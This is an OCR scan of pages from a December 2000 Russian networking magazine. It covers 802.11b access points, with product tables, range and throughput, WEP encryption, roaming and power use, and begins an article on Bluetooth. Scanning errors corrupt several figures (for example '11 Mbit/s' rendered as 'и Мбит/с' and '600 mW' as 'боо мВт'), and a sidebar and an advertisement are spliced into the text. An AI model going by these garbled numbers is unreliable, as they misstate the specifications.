сы с проводной сетью, возможность
подключения большего числа пользо-
вателей, более развитые функции уп-
равления. Более дорогие АР также луч-
ше интегрируются в сеть, состоящую
из нескольких подсетей, которые необ-
ходимы для охвата всего офисного зда-
ния. Кроме того, АР могут подклю-
чаться к внешней антенне и поддержи-
вать соединения между зданиями, на-
ходящимися друг от друга на расстоя-
нии до нескольких километров.
Во многих АР функции приемопере-
датчиков реализуются в картах PC
Card, идентичных тем, которые устанав-
ливаются па клиенте. Это делается во
многом для удобства производителей и
потребителей. Так, в некоторых случаях
в АР можно установить несколько та-
ких карт, поддерживая тем самым боль-
шее количество пользователей с помо-
щью одного АР. Или, в случае необходи-
мости, АР можно легко модернизиро-
вать для передачи в диапазоне 5 ГГц пу-
тем простой замены карты.
ДИАПАЗОН ДЕЙСТВИЯ
Количество необходимых АР напря-
мую зависит от дальности передачи ра-
диосигнала. Оценка расстояния, на ко-
торое будет распространяться радио-
сигнал, — это в той же степени искус-
ство, как и наука, о чем вам, должно
быть, хорошо известно, если вам когда-
либо приходилось мучиться с настрой-
кой радиоприемника на нужную ра-
диостанцию, притом, что для ваших
соседей это не составляло труда.
Одно известно точно: устройства в
стандарте 802.11b имеют меньший ра-
диус действия, когда они работают со
скоростью и Мбит/с, чем в тех случа-
ях, когда скорость составляет 5,5,2 или
1 Мбит/с. Вог почему стандарт преду-
сматривает автоматическое снижение
скорое ! и обмена для того, чтобы обеспе-
чить приемлемое качество соединения.
При наличии направленной антен-
ны для осуществления передачи в кон-
фигурации «точка-точка», устройства
стандарта 802.11b могут поддерживать
соединения на расстоянии свыше ю
миль (более 15 км) на самой высокой
скорости. Но при использовании не-
ориентированной антенны, как в ти-
пичной АР, радиус действия может со-
кратиться всего до 30 м.
В большинстве случаев может по-
требоваться несколько АР. Обычно они
устанавливаются в сети, состоящей из
перекрывающихся сот, в которой ко из-
бежание помех каждому из соседних
АР выделяются различные каналы. По
мере перемещения пользователя из од-
ной соты в другую его клиентский драй-
вер ведет поиск максимально устойчи-
вого сигнала и поддерживает связь.
В общем случае АР должны монти-
роваться максимально близко к потол-
ку, чтобы сигнал мог проникать за
офисные перегородки и другие препят-
ствия. Подведение одновременно
Ethernet и электропитания к АР, раз-
мещенных таким образом, может ока-
заться довольно сложной задачей; одна
из характерис тик АР, на которую сле-
дует обратить внимание, — это способ-
ность получать электропитание по ре-
зервной паре кабеля Категории ;.
ПРОИЗВОДИТЕЛЬНОСТЬ
Сети в стандарте 802.11b часто называют
беспроводным Ethernet, которым, на са-
34 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
Точки доступа (КОРПОРАТИВНЫЙ УРОВЕНЬ)
Компания Продукт
ЗСот AirConnect Wireless АР Breezecom AP-DS.ll Аппаратное обеспечение компании Symbol, но программное обеспечение ЗСот поддерживает Mobile IP, плюс к тому туннелирование на третьем уровне с помощью Microsoft Point to Point Encryption (MPPE). Менеджер SNMP, с управлением через графический пользовательский интерфейс. Слишком дорого для устройства со встроенным радиоадаптером и только одним портом lOBaseT
Cisco AIR-AP341/342 E2C Две встроенные антенны с поддержкой разнесения частот. 40-разрядная реализация Wired Equivalent Privacy (WEP) в модели 341; 128-разрядный WEP в модели 342.
Cisco AIR-AP341/342 E2R Для «проблемных» реализаций предлагает двойные разъемы для внешних антенн. 40-разрядный WEP в модели 341; 128-разрядный WEP в модели 342.
Cisco AIR-AP341 SIC Одна встроенная антенна, 40-разрядный WEP. Опережает своих конкурентов по производительности на 15% в тех случаях, когда используется с клиентскими адаптерами компании Cisco.
Colubris CN-1050 Необычная АР с портами Ethernet как для приема, так и для передачи. Функциональность виртуальной частной сети и межсетевого экрана как для проводных, так и для беспроводных клиентов. Поддерживает РРРоЕ и действует как клиент RADIUS. Управление возможно через Web.
Compaq WL-400 Аппаратная АР с двумя антеннами и встроенным радиоадаптером. OEM-версия продукта компании No Wires Needed.
Enterasys RoamAbout Компактная АР с возможностью получения электропитания по резервной паре кабелей Категории 5. 40- ипи 128-разрядное шифрование в зависимости от того, какая PC Card установлена в АР.
Intel PRO/Wireless LAN AP AP 2000 128-разрядный WEP, встроенный сервер HTTP, возможность подачи электропитания по сети Ethernet. Аналогична Symbol АР41Х1
Intermec 2100 Universal AP Два слота для карт и поддержка многочисленных радиостандартов. Возможность подогрева для работы в сложных условиях.
Intermec 2101 Universal Office AP Intermec 2102 Corporate AP Lucent AP-500 Более крупная версия модели 2102 с двумя слотами. Управление через браузер Web, telnet, ftp, SNMP, OpenView. Улучшенные возможности фильтрации Компактная АР весом менее 250 г. Возможность IP-туннелированин позволяет потребителям перемещаться по подсетям. Встроенный радиоадаптер и 128-разрядный WEP. Это новое поколение АР компании Lucent способно получать электропитание по кабелю Ethernet.
Lucent AP-1000 Разъем для внешней антенны, поддержка 128-разрядного шифрования. В отличие от большинства АР имеет два слота PC Card для радиоадаптеров.
No Wires Needed Enterprise AP Поддерживает 2048 пользователей со стандартным шифрованием WEP, 128-разрядным AirLock или 128-разрядным RC4
No Wires Needed Small Business AP Две антенны и интегрированный радиоадаптер. Поддержка до 64 пользователей, а также шифрования по стандартному протоколу WEP или 128-разрядному AirLock компании No Wires Needed.
Nokia A032 AP АР. с поддержкой NAT, DHCP и шифрования с 40- или 128-разрядными ключами. Наличие возможности организации коммутируемого соединения с провайдером Internet через внешний модем (дополнительная возможность).
Proxim Harmony AP АР с интерфейсом 10/100 Ethernet, 128-разрядным WEP и возможностью получения электропитания по кабелям Ethernet. Отдельный контроллер Harmony АР служит для управления различными АР как единым устройством, даже если некоторые из этих АР не являются 802.11Ь-совместимыми.
Proxim RangeLAN-DS АР имеет порт Ethernet на 10/100 и радиоадаптер на базе PC Card. Поддерживает 40-разрядный WEP или 128-разрядный RC4.
Samsung Magic LAN SWL-3000AP АР с портом Ethernet на 10/100 и 64- или 128-разрядным WEP. Для поддержки распределения нагрузки может быть определено предельное число обслуживаемых клиентов.
Symbol AP41X1 АР со встроенными неориентированными антеннами или внешним направленным устройством. Встроенный сервер управления HTTP. Возможность получения электропитания по кабелю Ethernet.
Zcomax XL-1000 Компактная АР с портом Ethernet на 10/100, управлением МАС-адресами и WEP. Меньше и легче большинства других АР.
Таблица 3. Access Point (АР) корпоративного уровня поддерживают шифрование и удаленное управление.
> http://www.lanmag.ru
Декабрь 2000 35
> ТЕМА НОМЕРА:
Точки доступа
(СПЕЦИАЛИЗИРОВАННЫЕ)
Продукт Отличительные особенности
Breezecom WBC-DS.il Remote Workgroup Bridge Связывает удаленную сеть Ethernet; может поддерживать до 1024 МАС-адресов.
Breezecom WBS-DS.ll Необходим на одном из концов соединения «точка-точка» или «точка-группа». Диапазон действия до 24 км с соответствующей внешней антенной Multipoint Base Station.
Серия Cisco Aironet BR 340 Мост для организации соединений между зданиями. Диапазон действия — до 40 км.
Entera RoamAbout 2000 То же аппаратное обеспечение, что и у стандартной АР, но с приобретением MultiPoint Activation Key позволяет соединять до семи зданий.
Lucent AS-1000 Сервер доступа для аэропортов, отелей и конференц-центров. Обеспечивает интеграцию с RADIUS и шифрованные каналы с индивидуальными ключами для каждого пользователя и каждого сеанса.
Lucent COR-llOO Центральный маршрутизатор для внешних локальных сетей с соединениями •один-ко-мнотим». Программное обеспечение Outdoor Router Client (ORC) дает провайдерам Internet возможность предлагать беспроводные услуги до 32 потребителям в расчете на каждый COR-llOO
Lucent ROR-IOOO Действует как конечная точка, подключаемая к COR-llOO, когда используется в режиме соединения между зданиями.
OverLAN RF-11 Wireless Bridge/Router Предназначен для организации связи между зданиями, находящимися друг от друга на расстоянии до 8 км. Шифрование предлагается как дополнительная возможность.
OverLAN RF-11 Plus Wireless Bridge/Router Увеличивает радиус действия до 8 км, имеет порт Ethernet на 10/100 Мбит/с.
Таблица 4. Точки доступа (АР) для оказания услуг доступа или обеспечения связи между зданиями.
мом деле, они не являются. По сути, это
сети с поддержкой множественного до-
ступа с распознаванием несущей и пре-
дотвращением коллизий (Carrier Sense
Multiple Access/Collision Avoidance,
CSMA/CA), с использованием сигна-
лов «запрос иередачи/готрв к передаче»
(Request to Send/Clear to Send,
RTS/CTS). Они также применяют ал-
горитм отката и должны передавать
часть заголовка пакета на скорости i
Мбит/с, чтобы гарантировать совмес-
тимость с унаследованными устройст-
вами стандарта 802.11.
Все это означает, что реальная пропу-
скная способность на самом деле ниже
номинальной скорости передачи дан-
ных в и Мбит/с. Самос быстрое устрой-
ство в стандарте 802.11b поддерживает
пропускную способность 5,5 Мбит/с. И
конечно же пропускная способность
распределяется между всеми пользова-
телями, работающими на той же часто-
те. Другими словами, беспроводная
часть любой АР всегда представляет со-
бой концентратор, а не коммутатор.
Увеличить пропускную способность
в пределах конкретной соты можно за
счет объединения в соте трех АР, рабо-
тающих на различных частотах. Почему
только грех? Потому что. хотя в полосе
частот 2,4 ГГц для использования заре-
зервировано 14 каналов (параметры мо-
гут слегка отличаться в разных странах),
частоты этих каналов характеризуют
только центральную частоту сигнала.
На практике передача по методу прямой
последовательности в размытом спектре
(Direct Sequence Spread Spectrum,
DSSS) приводит к расширению сигнала
настолько, что Четкий обмен данными
может быть налажен только при исполь-
зовании не более трех каналов.
Выделение любому конкретному
клиенту определенной частоты при на-
личии многочисленных соединений
процедура весьма утомительная. Она
требует ручной конфигурации про-
граммного обеспечения па каждом кли-
енте, и в итоге получается логический,
если не физический, эквивалент наско-
ро «состряпанной» сети. Лучше вообще
не пытаться это сделать: действитель-
но, если, к примеру, вам требуется дос-
тавить широкополосное видео пятиде-
сяти клиентам одновременно, то совре-
менное оборудование беспроводной
связи для этого явно не подходит.
ЗАЩИТА
В нашем опросе, проведенном в Internet.
25% участников, заявивших, что они не
при меня ют бес п ровод! i ые локал ы iы о
сети, сказали, что главная причина — в
неадекватном уровне защи ты. И для по-
добных утверждений есть все основа-
ния - вследствие высокого уровня сов-
местимости определить частоты, на ко-
торых работают эти системы, поэтому не
составляет труда к ним подключиться.
Для решения этой проблемы практи-
чески каждая точка доступа АР может
либо вручную, либо автоматически ге-
нерировать таблицу клиентских МАС-
адресов, с которыми она будет разре-
шать установление соединений. Кроме
того, доступ можно разрешать только
тем клиентам, которые знают имя сети.
Однако этот подход не позволяет
решить проблему перехвата пакетов,
передаваемых «по воздуху». Поэтому
АР и радиоадаптер разрешают пользо-
вателям применять протокол шифро-
вания Wired Equivalent Privacy
(WEP). Он опирается на алгоритм
шифрования RC 4 компании RSA Data
Security с 40- или 128-разрядными
ключами. (Некоторые производители
36 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
Это птица. Это самолет. А это SuperLAN
Универсальность оборудования в стандарте
802.11b во многих случаях приводит к реали-
зациям, размывающим традиционные границы
продуктов и служб. Это еще не глобальные сети,
но уже гораздо больше, чем обычные локальные.
Примером такого решения служит проект те-
хасских компаний Mobilestar и Wayport. Эти
компании устанавливают Access Point (АР) стан-
дарта 802.11 в аэропортах и отелях по всей стра-
не, а затем продают услуги доступа к ним либо
для разового обращения, либо сроком на год.
Захватив с собой в аэропорт мобильный компь-
ютер и клиентский адаптер, вам больше не при-
дется тесниться в кабине телефона-автомата
для того, чтобы получить коммутируемый дос-
туп в Internet.
Еще один пример был недавно анонсирован
компанией Sprint. Этот провайдер Internet плани-
рует развернуть АР компании Lucent Technologies
в многоквартирных домах, офисах небольших
компаний и других аналогичных зданиях. С по-
мощью Remote Authentication Dial-In User Service
(RADIUS) компания Sprint сможет предлагать по-
требителям беспроводной доступ в Internet, при-
чем. с точки зрения пользователей, он будет вы-
глядеть как обычное коммутируемое сетевое со-
единение. но работать значительно быстрее.
Некоторые провайдеры доступа Internet в
малонаселенных районах пошли еще дальше.
Компания Netbeam предлагает потребителям в
утверждают, что используют 64-раз-
рядную реализацию WEP. по в дейст-
вительности она эквивалентна 40-раз-
рядной реализации, так как дополни-
тельные 24 разряда служат для иденти-
фикации устройства в локальной сети.)
Несмотря на то что использование
WEP несколько снижает пропускную
способность, эта технология заслужи-
вает более пристального внимания. К
сожалению, опа может добавить забот
администратору в первую очередь по-
тому, что предусматривает примене-
ние общих ключей, рассылка которых
в виде строк из шестнадцатеричных
или строк в коде ASCII должна выпол-
няться вручную.
Некоторые производители предлага-
ют свой собственные, нестандартные ре-
шения для снятия Ограгшчений WEP. К
примеру, компания No Wires Needed
выпускает все АР и Клиентские адапте-
ры с их собственными открытыми и лич-
ными ключами. При взаимодействии
нескольких регионах доступ в Internet через
Orinoco АР компании Lucent. В определенных
случаях одна АР способна обслуживать 80%
территории города. Аналогичная услуга была
предложена компанией Sandwich Wireless.
Не стоит, однако, думать, что монтируемые
на вышках АР могут обеспечивать глобальную
связь непосредственно с клиентскими адаптера-
ми стандарта 802.11b, находящимися в помеще-
нии потребителя. Конечно, иногда потребитель
может связываться с вышкой напрямую со сво-
его мобильного компьютера, если он находится
в саду или около окна. Чаще всего, направлен-
ная антенна монтируется вне помещения потре-
бителя, а затем подключается к АР внутри дома.
После этого потребители выбирают нужные им
клиентские адаптеры для организации провод-
ной или беспроводной связи внутри дома.
Кроме того, программное обеспечение имеет
некоторые отличия, когда оборудование с часто-
той 2,4 ГГц используется в конфигурациях «зда-
ние-здание» или «один-ко-многим». Специаль-
ное клиентское программное обеспечение для
внешних маршрутизаторов позволяет увеличить
пропускную способность и диапазон действия за
счет исключения некоторых функций стандарта
802.11b. Например, оно не предусматривает пе-
редачу преамбулы со скоростью 1 Мбит/с и реа-
лизацию алгоритма случайной задержки, если со-
ответствие стандарту является необязательным.
друг с другом они используют алгоритм
соглашения о ключах Диффи-Хеллмана
для создания разделяемого ключа.
Компания 4С0Ш предлагает иное ре-
шение, основу которого составляет
шифрование Microsoft Point to Point
Encryption (MPPE) на третьем уровне.
В этом случае маршрутизатор
SuperStack 11 Router компании }Com
размещается между АР и проводной се-
тью компании. Пользователи беспро-
водной локальной сети выполняют ре-
гистрацию в се ти гак же, как при ком-
мутируемых телефонных соединениях,
при этом для аутентификации исполь-
зуется информация, хранящаяся в базе
данных службы Remote Authentication
Dial-In User Service (RADIUS). Затем
данные шифруются с помощью МРРЕ
для передачи их от клиента маршрути-
затору. АР, предназначенные для пре-
доставления услуг доступа, такие, как
АР-юоо компании Lucent, применяют
очень похожий метод.
ТРУДНОСТИ УПРАВЛЕНИЯ
Помимо сложностей защиты при реа-
лизации беспроводных локальных се-
тей возникают проблемы управления,
отсутствующие в случае проводных
систем. Одна из этих проблем связана
с поддержкой мобильных клиентов.
Стандарт 802.11b не отличается кон-
кретикой в разделе, описывающем ро-
уминг. Поэтому, чтобы обеспечить на-
дежную передачу эстафеты от одной со-
ты к другой, вам, весьма возможно, при-
дется приобретать все АР у одного про-
изводителя. Но даже и в этом случае мо-
гут возникнуть проблемы, когда клиен-
ты переходя т из одной подсети в другую.
Если пользователи просто перемеща-
ются из одного стационарного положе-
ния в другое, возможно, с одного рабоче-
го стола на другой, то IP-адреса можно
раздавать им с помощью сервера DI ICP.
В таком случае пользователей следует
обучить, как освобождать и обновлять
аренду адреса, когда это требуется.
Ситуация намного усложняется, ес-
ли пользователи все время находятся в
движении. Одно из возможных реше-
ний Mobile IР, реализованное компа-
нией }Сот. Когда клиент покидает .зону
обслуживания своей домашней точки
АР и попадает в другую подсеть, новая
АР создает туннель между клиентом и
его домашние!! АР. а затем передает по
нему весь трафик. (Более подробную
информацию о Mobile IP можно найти
в статье Р. Ричардсона «Mobile IP вы-
ходит на широкую дорогу», в декабрь-
ском номере LAN за 1999 г.)
Традиционно производители снаб-
жают своп АР фирменными пршрамма-
ми управления. Лишь некоторые из них
поддерживают управление через после-
довательный порт или посредством
Web либо используют еще какой-ни-
будь способ внесения изменений в кон-
фигурацию многочисленных АР пред-
приятия. Ситуация, хотя и медленно, но
меняется, однако это по-прежнему оста-
ется одной из основных причин для ис-
пользования АР от одного производите-
ля. даже если продукты являются сов-
местимыми во всех других отношениях.
ЭНЕРГОПОТРЕБЛЕНИЕ
Одна из важнейших особенностей обо-
рудования для беспроводных локаль-
ных сетей состоит в том, что оно не
имеет шнуров. Но если мобильный
38 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА: БЕСПРОВОДНЫЕ СЕТИ 802.11В
компьютер приходится постоянно дер-
жать включенным в сеть питания, по-
скольку его радиоадаптер быстро рас-
ходует энергию батарей, то в чем же
выигрыш?
Следовательно, энергопотребление
является очень важной характеристи-
кой таких систем. К сожалению, опре-
делить ее на основе спецификаций,
предлагаемых производителями, прак-
тически невозможно. Некоторые про-
тивопоставляют технологию на 3,5 В
технологии на 5 В, но в реальной жизни
они отличаются незначительно. Энер-
гопотребление от адаптера к адаптеру
варьируется в широких пределах —
меньше всего энергии потребляют про-
дукты компании No Wires Needed, но
это непосредственно сказывается на
фактической пропускной способности.
Не менее важным остается вопрос
об опасности беспроводных сетей для
здоровья человека. Этот вопрос, скорее
всего, будет обсуждаться еще десяти-
летия, подобно тому, как вот уже дол-
гие годы служит предметом дискуссий
безопасность линий электропередач.
Однако беспроводные локальные сети
намного безопаснее, чем микроволно-
вые печи и сотовые телефоны.
Так, в любой момент времени в сеч и
активен лишь один передатчик. Следо-
вательно, общая мощность излучения
всей сети, состоящей, скажем, из юо
узлов, эквивалентна мощности излуче-
ния одного передатчика — как прави-
ло, она составляет около 33 мВт. Что
же касается риска для любого конкрет-
ного пользователя, то радиоадаптер
может быть подключен к сети и готов к
использованию, по он останется в не-
работающем состоянии до тех пор, по-
ка реально не потребуется для переда-
чи данных. В этом состоит отличие
адаптеров беспроводных сетей от сото-
вых телефонов, которые всегда излуча-
ют энергию около боо мВт вне зависи-
мости от того, используются они в дан-
ный момент или нет.
BLUETOOTH И НЕ ТОЛЬКО
Через несколько месяцев после начала
рекламной шумихи наконец была пред-
ставлена альтернативная технология
беспроводных сетей - Bluetooth (см.
статью «По зубам ли Bluetooth сетевые
технологии?» в этом номере). Хотя
Bluetooth не разрабатывалась как тех-
дани
III.ПИ!
дани
Приобретая оборудование у
нас, спросите про систему
бонусов, по которой вы
бесплатно получите: опти-
ческие шнуры, сварку кабеля
скидки и т.д.
Узнайте подробности на
нашем WEB-сайте.
Доступная оптика
маркетинговая акция Д\
Fiber Driver™ OptiSwitch™
И|Optical Access
ВИМКОГ». ЗАО "Вимком Оптик ТС”
О П Т И к Тел.: (095) 306-1242. 737-3757. факс: (095) 737-3755
E-mail: info@vimcom.ru Internet http://www.vimcom.ru
иология локальных сетей, ее можно ис-
пользовать в таком качестве при нали-
чии необходимого программного обес-
печения. Вносит ли эта технология су-
мятицу на рынок или является основой
для полезных служб, зависит от точки
зрения — такие провайдеры, как
Cerulic, даже предлагают Bluetooth как
способ обеспечения выхода в Internet в
аэропортах.
Bluetooth не заменит оборудование
для беспроводных локальных сетей,
поскольку ее максимальная пропуск-
ная способность составляет всего око-
ло 8оо Кбит/с. Главной целью разра-
ботки данной технологии была мини-
мизация энергопотребления, в силу че-
го она имеет весьма ограниченный ра-
диус действия. И, кроме того, в
Bluetooth не предусмотрены процеду-
ры обеспечения перехода от одной АР
к другой. Таким образом, использова-
ние этой технологии для охвата всего
офиса с помощью нескольких АР ока-
зывается крайне затруднительным, ес-
ли не сказать больше.
Что же может прийти на смену се-
годняшним беспроводным локаль-
ным сетям, работающим на частоте
2,4 ГГц? В ближайшие год — или два,
три или четыре, в зависимости от то-
го, у кого вы спрашиваете, — их место
займут системы, работающие в поло-
се частот 5 ГГц. Базирующиеся на
стандартах 802.па и HiperLANz или,
что еще лучше, на некотором объеди-
нении этих двух стандартов в соот-
ветствии с предложением 5-UP, они
смогут обеспечить пропускную спо-
собность в 54 Мбит/с и будут защи-
щены от помех.
Стоит ли подождать? Это решать
вам. Однако законы физики говорят о
том, что системы, работающие на час-
тоте 5 ГГц, при прочих равных услови-
ях, будут иметь более высокий уровень
энергопотребления и более ограничен-
ны й радиус действия. LAN
Джонатан Эйнджел - старший редак-
тор Network Magazine. С ним можно
связаться по адресу jangel@cmp.com.
> http://www.lanmag.ru
Декабрь 2000 39
По зубам ли Bluetooth
сетевые технологии?
Притязания Bluetooth не ограничиваются только
потребительским рынком. Несмотря на свою потенциальную
полезность, этот радиостандарт с малым радиусом действия
может внести серьезные помехи в работу вашей сети.
Энди Дорнан
В качестве узлов вычислительных
сетей до сих нор выступали совер-
шенно определенные устройства -
чаще всего настольные компьютеры,
иногда серверы, н лишь изредка — эк-
зотические устройства, например меж-
сетевые экраны. II ничего кроме. Стан-
дарт Bluetooth позволяет встраивать де-
шевые однокристальные радио-адапте-
ры практически во что угодно, благода-
ря чему сетевые технологии могут стать
практически вездесущими. Если верить
адептам этой технологии, сетевое со-
единение смогут поддерживать даже
наручные часы, мусорная корзина или
копировальное устройство в офисе. Да-
же ваша чашка кофе.
II еще. Шумная рекламная кампа-
ния по поводу Bluetooth предрекала
появление практических реализаций
технологии в начале 2000 г. Сейчас,
спустя почти год после этого срока, от-
расль все еще борется со сложностями
в обеспечении совместимости и выну-
ждена мириться с дороговизной микро-
схем. Продукты были анонсированы,
даже продемонстрированы, по никто,
кроме сотрудников лабораторий в ком-
паниях-производителях и работников
выставок, не применяет их на практике.
Даже если в середине 2001 г. внедре-
ние Bluetooth действительно начнется,
это вовсе нс будет означать наступле-
ния поры бесшовных сетевых реше-
ний. как надеялись пропагандисты.
Некоторые аналитики даже утвержда-
ют, что технология окажется просто
неработоспособной. «Использование
Bluetooth для связи устройств различ-
© Miller Freeman Inc.
ных производителей — это утопия»,
уверен Гален Шрек, аналитик Forrester
Research.
Быть может, он и прав, но админи-
страторы сетей должны иметь предста-
вление о преимуществах и недостатках
Bluetooth. К преимуществам этой тех-
нологии следует отнести то, что она, во
всяком случае частично, ликвидирует
«спагетти» проводов, болтающихся за
столами в большинстве офисов. К не-
достаткам — неумеренный аппетит на
радиочастоты, отнимающий полосу ча-
стот у других беспроводных локаль-
ных сетей.
Создатели сетевых архитектур бу-
дут, возможно, поначалу игнорировать
Bluetooth, но, в конце концов, им при-
дется иметь с ней дело. Несмотря на то
что эта технология часто рекламирует-
ся преимущественно как техническая
новинка для массового потребителя,
она мало-помалу должна проникнуть и
на предприятия. Три года назад во
многих информационных подразделе-
ниях корпораций царила уверенность,
что нм удастся избежать необходимо-
сти поддерживать Palm Pilot и прочие
устройства PDA, однако пользователи
просто накупили их для своих личных
целей, а потом стали применять и на
работе. Возможно, через три года то же
самое случится и с Bluetooth.
НО КАКОВ ЦВЕТ!
Годом рождения Bluetooth можно счи-
тать 1994. Идея технологии возникла в
рамках одного из проектов производи-
теля мобильных телефонов Ericsson, в
то время в ней видели способ обеспе-
чить взаимодействие телефонов с таки-
ми приспособлениями, как беспровод-
ные наушники. Специалисты компа-
нии полагали, что покупатели найдут
это более удобным, нежели свешиваю-
щийся из уха провод. Тогда никто не
мог и представить, что к соображениям
удобства и эстетики следует добавить
медицинские доводы. Впрочем, тогда
подобных исследований еще не было,
сейчас же, по утверждениям британ-
ской Consumers’ Association, допод-
линно известно, что наушники с прово-
дами отнюдь не защищают! здоровье, а
напротив, направляют излучение непо-
средственно в мозг пользователя.
В Ericsson поняли, что подобная
беспроводная связь должна быть реа-
лизована в виде очень маленького и не-
дорогого устройства так, чтобы все не-
обходимые функции были заключены
в одной микросхеме. Его можно было
бы применять не только для связи мо-
бильных телефонов с наушниками, но
и для других целей, однако для этого
требовалась поддержка многочислен-
ных производителей. В мае 1998 г. ком-
пания объединила силы со своим глав-
ным конкурентом — Nokia, а также с
такими тяжеловесами, как Intel,
Toshiba и IBM, и создала Bluetooth
Special Interest Group (SIG). Свое имя
технология получила от Гаральда Го-
лубой Зуб (как, собственно, и перево-
дится Bluetooth), легендарного викин-
га, объединившего в X веке Данию и
Норвегию. Члены S1G пообещали, что
за полтора года Bluetooth сделает то же
самое с разрозненными технологиями.
Даже если Bluetooth не докажет
своей состоятельности как технология,
она все-таки уже продемонстрировала,
40 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
1 ОХАЛЬНОЙ СЕТИ
что производители способны работать вместе. SIG выросла
в альянс, объединяющий почти 2000 компаний, и едва ли не
каждый день к нему присоединяются все новые компании-
новички этой отрасли. Правила членства просты — вступить
в альянс может любая компания, но она должна предоста-
вить всем остальным его участникам бесплатную лицензию
на использование любой технологии, которую она разрабо-
тает в рамках проекта Bluetooth. Это сделано во избежание
конфликтов вокруг патентов, погубивших многие другие
начинания альянсов производителей, например Wireless
Application Protocol (WAP).
В SIG участвуют почти все компании, так или иначе заня-
тые в компьютерной или сетевой отрасли, а также множество
других, как, например, производители кухонной электронной
техники. Эти производители с особым рвением рассылают
пресс-релизы о том, как Bluetooth введет их в мир сетевых
технологий. Подобные пресс-релизы служат лишь источни-
ком дополнительного скептицизма и недоверия к способно-
сти этой технологии поддерживать нс только пресловутые
Internet-тостеры, по и серьезное оборудование для бизнеса.
Некоторые члены SIG только подливают масла в огонь.
Они предсказывают благословенные времена, когда банки с
пивом будут сообщать холодильнику, а он, через наручные
часы, и досужему обывателю, что напиток приобрел требуе-
мую для употребления внутрь температуру. Или рассказы-
вают о мусорном баке, который попросит, чтобы его увезли,
когда он окажется заполненным доверху. Между тем холо-
дильник будет заказывать по Internet все новые и новые
башен напитка, а одновременно сообщит автомобилю, что
его владелец протрезвеет еще очень нескоро.
Фантастика? Пока да, но в полном соответствии с зако-
ном Мура стоимость микросхем продолжает снижаться.
Сейчас производство одной микросхемы Bluetooth обходит-
ся в 30 долларов, но за два года цены вполне могут опустить-
ся и до намеченного S1G рубежа в 4 доллара. После этого
устройства будут продолжать дешеветь. Смарт-карты уже
превратили кремний в расходный материал, аза прошедшие
десять лет мы стали свидетелями превращения компакт-
дисков из доступной далеко не каждому роскоши в некий
блестящий предмет, которым AOL бомбардирует миллионы
пользователей. По прогнозам Media Lab Массачусетского
политехнического института, к 2010 г. каждый американец
будет иметь в своей единоличной собственности 5000 про-
дуктов, подключенных к Internet.
Хотя Bluetooth, теоретически, может связать между со-
бой все что угодно, ее первоначальная цель — интеграция
домашних и офисных приборов и устройств. «Копироваль-
ная машина будет «знать», что она сломана или вот-вот сло-
мается, — поясняет Тони Валентино, менеджер Alcatel по
развитию направления Bluetooth. — При помощи Bluetooth
она соединится с ПК. а тот пошлет электронное письмо про-
изводителю. Тогда явится ремонтная бригада с необходи-
мыми инструментами и запчастями в руках».
КАСТРЮЛЯ В СЕТИ
Bluetooth предназначена не только для обеспечения автома-
тической связи между машинами. Подчеркивая ее отличие
от беспроводных технологий локальных сетей, члены SIG
> http://www.lanmag.ru
Декабрь 2000
41
> ТЕМА НОМЕРА:
Рисунок 1. Разнесенная сеть образована нескольки-
ми пикосетями. Хотя фотокопировальное устройст-
во не подключено непосредственно к Internet, оно
может получить доступ в локальную сеть, используя
один из компьютеров в качестве маршрутизатора.
Расстояние от точки доступа (м)
Рисунок 2. Беспроводные сети, поддерживающие
протокол IEEE 802.11b. должны обеспечивать ско-
рость передачи в 11 Мбит/с на расстоянии 100 м.
Реальная пропускная способность несколько мень-
ше, но скорость передачи данных резко уменьша-
ется, когда один из узлов сети 802.11b оказывает-
ся в пределах работающей пикосети Bluetooth.
Ресурсы Internet
Помимо специализированных изданий и самих
производителей, единственным заслуживаю-
щим внимания сайтом с информацией о
Bluetooth является http://www.bluetooth.com,
где свободно предлагаются все официальные
спецификации и другая информация Bluetooth
Special Interest Group (SIG). Как утверждается,
на нем будет размещен также полный каталог с
фотографиями каждого реально существующе-
го устройства Bluetooth. Несмотря на то что в
работу вовлечены около 2000 производителей,
этот каталог все еще не слишком велик.
характеризуют ее как технологию для
персональных сетей (Personal Area
Networks, PAN). Эти сети будут окру-
жать человека, охватывая буквально
каждое устройство, которым он поль-
зуется. Сотовый телефон или мобиль-
ный компьютер будет иметь возмож-
ность общаться с холодильником дома,
с охранной системой на работе, а также
с различными устройствами, принад-
лежащими людям, с которыми встре-
чается его владелец.
Сторонники Bluetooth пополнили
новояз еще одним словом - пикосеть.
Пикосеть — это очень маленькая сеть,
включающая не более восьми узлов.
На первый взгляд это ограничение ка-
жется весьма жестким, но, вообще го-
воря, несколько пикосетей могут быть
объединены в разнесенную сеть (scut-
ternet) (см. Рисунок г), масштаб кото-
рой неограничен. Пикосеть — не то же
самое, что персональная сеть, посколь-
ку производители считают, что у поль-
зователей будет более восьми прибо-
ров, поддерживающих Bluetooth. Не
всем им понадобится взаимодейство-
вать друг с другом, и это означает, что
они могут находиться в разных пико-
сетях. Так, например, наушники в каж-
дый момент времени соединяются
только с одним устройством, так как
навряд ли кто-то станет слушать музы-
ку в то время, как звонит по телефону.
Еще одно отличие PAN от беспро-
водной локальной сета состоит в низ-
кой скорости передачи данных. Макси-
мальная пропускная способность
Bluetooth составляет не более i Мбит/с,
что реально означает только 780 Кбит/с,
если принять во внимание накладные
расходы на протокол. Причем это не ду-
плексная пропускная способность, а
разделяемая между всеми узлами сети.
Кроме того, многие пикосети могут ра-
ботать на одних и тех же частотах. В сре-
де, где нет иных помех, пропускная спо-
собность каждой дополнительной пико-
сети снижается на 1,3%.
Обеспечиваемая Bluetooth пропу-
скная способность в 780 Кбит/с может
разделяться несколькими способами.
Основной для этой технологии прото-
кол управления логическими канала-
ми и адаптацией (Logical Link Control
and Adaptation Protocol, LzCAP) пред-
усматривает два тина передачи дан-
ных. Асинхронный протокол коммута-
ции пакетов без установления соеди-
нений (Asynchronous Connectionless
Links, ACL), основанный на Ethernet,
обеспечивает асимметричную переда-
чу данных в одном направлении со
скоростью до 722 Кбит/с. Синхронный
протокол коммутации каналов с уста-
новлением соединений (Circuit-
switched Synchronous Connection
Oriented links, SCO), основанный на
GSM, поддерживает дуплексные кана-
лы на 128 Кбит/с. В одной пикосети
могут быть объединены оба типа пере-
дачи, либо весь диапазон частот может
быть выделен одному тину. Если ис-
пользуется только протокол SCO, то
доступными становятся три отдельных
канала.
